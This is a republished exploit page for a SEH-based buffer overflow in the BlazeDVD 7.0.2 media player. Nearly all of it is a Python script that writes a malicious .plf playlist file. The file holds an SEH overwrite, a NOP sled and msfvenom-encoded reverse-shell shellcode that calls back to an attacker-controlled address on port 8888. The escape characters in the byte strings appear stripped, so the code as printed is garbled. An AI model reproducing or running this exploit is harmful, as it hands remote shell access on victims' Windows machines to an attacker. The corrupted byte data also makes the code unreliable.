Exploit/Advisories

Published on April 15th, 2020 📆 | 4827 Views ⚑

0

BlazeDVD 7.0.2 Buffer Overflow ↭


iSpeech

# Exploit Title: BlazeDVD 7.0.2 - Buffer Overflow (SEH)
# Date: 2020-04-15
# Exploit Author: areyou1or0
# Software Link: http://www.blazevideo.com/dvd-player/free-dvd-player.html
# Version: 7.0.2
# Tested on: Windows 7 Pro x86

#!/usr/bin/python

file = "exploit.plf"
offset ="A"*(612-4)
nseh = "xebx1ex90x90"
seh = "x34x31x02x64"
nops = "x90" * 24

# msfvenom -p windows/shell_reverse_tcp LHOST=3D192.168.8.121 LPORT=8888= -f python -e x86/alpha_mixed -b 'x00x0ax0dxff'
shellcode = ""
shellcode += "x89xe2xdaxccxd9x72xf4x5ax4ax4ax4ax4ax4a"
shellcode += "x4ax4ax4ax4ax4ax4ax43x43x43x43x43x43x37"
shellcode += "x52x59x6ax41x58x50x30x41x30x41x6bx41x41"
shellcode += "x51x32x41x42x32x42x42x30x42x42x41x42x58"
shellcode += "x50x38x41x42x75x4ax49x59x6cx69x78x4ex62"
shellcode += "x53x30x63x30x45x50x45x30x6fx79x7ax45x46"
shellcode += "x51x79x50x73x54x4cx4bx76x30x66x50x6ex6b"
shellcode += "x66x32x74x4cx6cx4bx51x42x72x34x4cx4bx34"
shellcode += "x32x31x38x76x6fx6cx77x61x5ax47x56x66x51"
shellcode += "x6bx4fx6ex4cx75x6cx65x31x33x4cx64x42x64"
shellcode += "x6cx31x30x5ax61x38x4fx64x4dx66x61x7ax67"
shellcode += "x49x72x6ax52x71x42x30x57x6cx4bx53x62x36"
shellcode += "x70x6ex6bx30x4ax45x6cx6cx4bx32x6cx37x61"
shellcode += "x43x48x6ax43x31x58x55x51x6bx61x32x71x4c"
shellcode += "x4bx33x69x47x50x75x51x6ax73x4cx4bx47x39"
shellcode += "x72x38x4dx33x56x5ax30x49x4ex6bx57x44x6c"
shellcode += "x4bx43x31x7ax76x55x61x79x6fx4ex4cx6ax61"
shellcode += "x78x4fx54x4dx33x31x58x47x54x78x59x70x44"
shellcode += "x35x6bx46x75x53x63x4dx48x78x75x6bx51x6d"
shellcode += "x46x44x74x35x6bx54x72x78x4cx4bx70x58x45"
shellcode += "x74x43x31x79x43x50x66x4cx4bx74x4cx32x6b"
shellcode += "x6ex6bx52x78x47x6cx46x61x69x43x6cx4bx47"
shellcode += "x74x6cx4bx37x71x4ax70x6dx59x30x44x46x44"
shellcode += "x44x64x33x6bx71x4bx65x31x43x69x71x4ax52"
shellcode += "x71x79x6fx69x70x51x4fx51x4fx51x4ax4cx4b"
shellcode += "x57x62x58x6bx4ex6dx63x6dx35x38x55x63x64"
shellcode += "x72x43x30x65x50x75x38x64x37x43x43x44x72"
shellcode += "x43x6fx42x74x52x48x50x4cx71x67x67x56x44"
shellcode += "x47x59x6fx69x45x68x38x7ax30x37x71x63x30"
shellcode += "x63x30x46x49x6fx34x71x44x42x70x32x48x56"
shellcode += "x49x6dx50x42x4bx57x70x69x6fx49x45x56x30"
shellcode += "x50x50x36x30x30x50x33x70x66x30x67x30x76"
shellcode += "x30x32x48x4ax4ax54x4fx39x4fx4dx30x39x6f"
shellcode += "x49x45x6ex77x42x4ax63x35x30x68x69x50x6e"
shellcode += "x48x46x68x61x69x62x48x34x42x63x30x65x72"
shellcode += "x6fx48x4fx79x4ax46x62x4ax46x70x52x76x52"
shellcode += "x77x65x38x4dx49x4dx75x71x64x70x61x4bx4f"
shellcode += "x58x55x4cx45x4fx30x34x34x54x4cx6bx4fx70"
shellcode += "x4ex34x48x63x45x5ax4cx42x48x6ax50x68x35"
shellcode += "x4cx62x32x76x39x6fx5ax75x63x58x61x73x32"
shellcode += "x4dx63x54x57x70x4fx79x38x63x52x77x73x67"
shellcode += "x62x77x30x31x7ax56x63x5ax67x62x71x49x33"
shellcode += "x66x79x72x59x6dx35x36x58x47x30x44x67x54"
shellcode += "x37x4cx75x51x46x61x6cx4dx37x34x64x64x66"
shellcode += "x70x7ax66x75x50x52x64x32x74x76x30x56x36"
shellcode += "x63x66x46x36x73x76x71x46x70x4ex30x56x76"
shellcode += "x36x51x43x51x46x50x68x71x69x48x4cx57x4f"
shellcode += "x6ex66x69x6fx6ax75x4bx39x79x70x42x6ex33"
shellcode += "x66x47x36x79x6fx36x50x53x58x76x68x4cx47"
shellcode += "x57x6dx31x70x59x6fx6ax75x4fx4bx6cx30x58"
shellcode += "x35x79x32x72x76x53x58x4fx56x6dx45x6fx4d"
shellcode += "x6dx4dx79x6fx4ax75x55x6cx34x46x31x6cx56"
shellcode += "x6ax4bx30x59x6bx6dx30x31x65x66x65x6dx6b"
shellcode += "x33x77x35x43x53x42x72x4fx50x6ax37x70x61"
shellcode += "x43x49x6fx68x55x41x41"





buffer = offset + nseh + seh + nops + shellcode

f = open(file,'w')
f.write(buffer)
f.close()

Source link

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑